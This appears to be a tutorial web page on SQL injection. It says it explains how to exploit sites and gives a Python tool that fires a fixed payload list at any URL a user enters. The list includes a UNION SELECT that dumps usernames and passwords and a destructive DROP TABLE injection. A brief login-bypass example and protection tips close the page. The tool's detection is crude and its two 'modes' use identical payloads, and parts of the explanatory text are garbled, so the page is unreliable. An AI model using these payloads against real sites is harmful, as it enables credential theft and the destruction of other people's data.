What Are SQL Injections?
SQL injections are a type of vulnerability in web applications that allows an attacker to interfere with the queries an application makes to its database. This can lead to the theft of sensitive data or even full control of the database. And here we explain how to exploit sites with SQLi injections. (For educational purposes only.)
We have a VulEasy for you.
import requests
from bs4 import BeautifulSoup
import re
import platform
import subprocess
import time
payload_1 = [
"' OR '1'='1 --'",
"'or 1=1 --",
"'or 1=1 --' LIMIT 1",
"' OR '1'='1",
"' OR '1'='1' --",
"' OR '1'='1' /*",
"' OR ''='",
"' UNION SELECT NULL, username, password FROM users --",
"' OR '1'='1' LIMIT 1 --",
"'; DROP TABLE users; --",
"'; --",
"admin' --",
"' AND '1'='1' --",
"' AND '1'='2' --"
]
payload_2 = [
"' OR '1'='1 --'",
"'or 1=1 --",
"'or 1=1 --' LIMIT 1",
"' OR '1'='1",
"' OR '1'='1' --",
"' OR '1'='1' /*",
"' OR ''='",
"' UNION SELECT NULL, username, password FROM users --",
"' OR '1'='1' LIMIT 1 --",
"'; DROP TABLE users; --",
"'; --",
"admin' --",
"' AND '1'='1' --",
"' AND '1'='2' --"
]
history = []
def is_valid_url(url):
regex = re.compile(
r'^(https?|ftp):\/\/[^\s/$.?#].[^\s]*$', re.IGNORECASE
)
return re.match(regex, url) is not None
def detect(input_sequence):
if len(input_sequence) != 2:
return "[!] Please enter a mode (/1 or /2) followed by a URL."
mode, url = input_sequence
if mode not in ['/1', '/2']:
return "[!] First input must be /1 (Rapid payloads) or /2 (Time-based payloads)."
elif not is_valid_url(url):
return "[!] The second input must be a valid URL."
else:
return f"Mode: {mode}, URL: {url}"
def scan_sql_injection(url, payloads):
vulnerabilities_found = False
vulnerable_payloads = []
print(f"\n[+] Scanning URL: {url} with {len(payloads)} payloads...\n")
for payload in payloads:
for method in ['POST', 'GET']:
try:
start_time = time.time()
if method == 'POST':
response = requests.post(url, data={"username": payload, "password": "password"}, timeout=5)
else:
response = requests.get(url, params={"username": payload}, timeout=5)
end_time = time.time()
response_time = end_time - start_time
if response.status_code == 200:
soup = BeautifulSoup(response.text, 'html.parser')
if response_time > 2 or "error" not in soup.text.lower():
vulnerabilities_found = True
vulnerable_payloads.append(payload)
print(f"[Vulnerable] Found with payload: {payload} using {method}")
except requests.RequestException as e:
print(f"[Error] Request failed with payload: {payload} - {e}")
if not vulnerabilities_found:
print("\n[Secure] No vulnerabilities found.")
else:
print("\n[!] Manual Validation Recommended for the following payloads:\n")
for vp in vulnerable_payloads:
print(f"- {vp}")
def clear_terminal():
command = "cls" if platform.system() == "Windows" else "clear"
subprocess.call(command, shell=True)
def show_history():
if history:
print("History of scanned URLs:")
for idx, url in enumerate(history, start=1):
print(f"{idx}: {url}")
else:
print("No URLs in history.")
def clear_history():
history.clear()
print("History cleared.")
def list_commands():
print("/1 - Scan using a single rapid payload")
print("/2 - Scan using two time-based payloads")
print("/clear - Clears the terminal")
print("/history - Shows the command history")
print("/clearhistory - Clears the command history")
print("/list - Shows this list of commands")
print("/credits - Shows creator name")
print("/exit - Exit for exit here ")
print("/quit - Quit for go ere")
def credits():
print("Developed by @mrduck123 using ChatGPT.\n")
def main():
selected_mode = None
while True:
print("## ## ## ## ## ##### ### ### ## ##")
print("## ## ## ## ## ##### ## ## ## # ####")
print("## ## ## ## ## #---- ##---## ## ##")
print("## ## ## ## #### ##### ## ## # ## ##")
print(" ### ##### #### ##### ## ## ### ##")
print("/1 for 1 payload's (Rapid's Payload's) /2 for 2 method payload's (Based time payload's)")
print("Enter a mode (/1 or /2) followed by a URL to start scanning.\n")
user_input = input("Enter URL (You want go use /exit or /quit view the list of commands /list): ")
if user_input.lower() in ['/exit', '/quit']:
break
elif user_input == '/clear':
clear_terminal()
elif user_input == '/history':
show_history()
elif user_input == '/clearhistory':
clear_history()
elif user_input == '/list':
list_commands()
elif user_input == '/credits':
credits()
elif user_input in ['/1', '/2']:
selected_mode = user_input
print(f"[+] Mode selected: {selected_mode}. Now enter a valid URL to proceed")
elif is_valid_url(user_input):
if not selected_mode:
print("[!] Please select a mode first (/1 or /2) before entering a URL")
else:
history.append(user_input)
print(f"[+] URL added to history: {user_input}")
if selected_mode == '/1':
scan_sql_injection(user_input, payload_1)
elif selected_mode == '/2':
scan_sql_injection(user_input, payload_2)
selected_mode = None
else:
print("[!] Invalid input. Enter a valid command or URL or PLEASE SELECT A MODE FIRST (/1 OR /2)")
if __name__ == "__main__":
main()
Login Example
Original Query:
Injected Query:
In this case, the attacker uses the
SELECT * FROM users WHERE username = 'admin' AND password = '1234';
Injected Query:
SELECT * FROM users WHERE username = 'admin' -- ' AND password = '1234';
In this case, the attacker uses the
-- symbol to comment out the rest of the SQL query, bypassing the password check.
How to Protect Yourself?
- Use prepared statements.
- Validate and sanitize all user inputs.
- Use database accounts with minimal permissions.
- Implement firewalls and security tools.